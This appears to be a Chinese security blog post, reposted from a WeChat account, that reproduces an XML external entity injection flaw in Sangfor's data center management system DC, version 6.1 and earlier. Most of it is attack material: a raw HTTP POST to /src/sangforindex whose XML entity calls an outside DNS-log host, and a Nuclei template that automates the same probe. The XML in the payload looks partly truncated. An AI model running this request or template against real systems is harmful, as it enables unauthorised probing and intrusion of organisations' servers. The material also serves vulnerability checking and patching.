night安全致力于分享技术学习和工具掌握。然而请注意不得将此用于任何未经授权的非法行为,请您严格遵守国家信息安全法律法规。任何违反法律、法规的行为,均与本人无关。如有侵权烦请告知,我们会立即删除并致歉。谢谢!
漏洞概述
深信服数据中心管理系统DC存在一个XML外部实体注入漏洞。由于后端对传入的XML对象进行了非预期内解析,攻击者可以利用该漏洞进行XML注入攻击。
受影响版本:<=6.1
漏洞复现
POST /src/sangforindex HTTP/1.1Host: xxxUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 141<!ENTITY rootas SYSTEM "http://xxx.dnslog.cn">]><xxx>&rootas;</xxx>
NUCLEI POC
id: sangfor-dc-sangforindex-xxeinfo:name: 深信服DC数据中心管理系统sangforindex xxe注入漏洞author: YGnightseverity: highdescription: descriptionreference:- https://tags: tagsrequests:- raw:- |-POST /src/sangforindex HTTP/1.1Host: {{Hostname}}Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 141<!ENTITY rootas SYSTEM "http://xxx.dnslog.cn">]><xxx>&rootas;</xxx>matchers-condition: andmatchers:- type: statusstatus:- 404- type: wordwords:- '/src/sangforindex'
原文始发于微信公众号(night安全):【漏洞复现】深信服数据中心管理系统DC存在XML外部实体注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论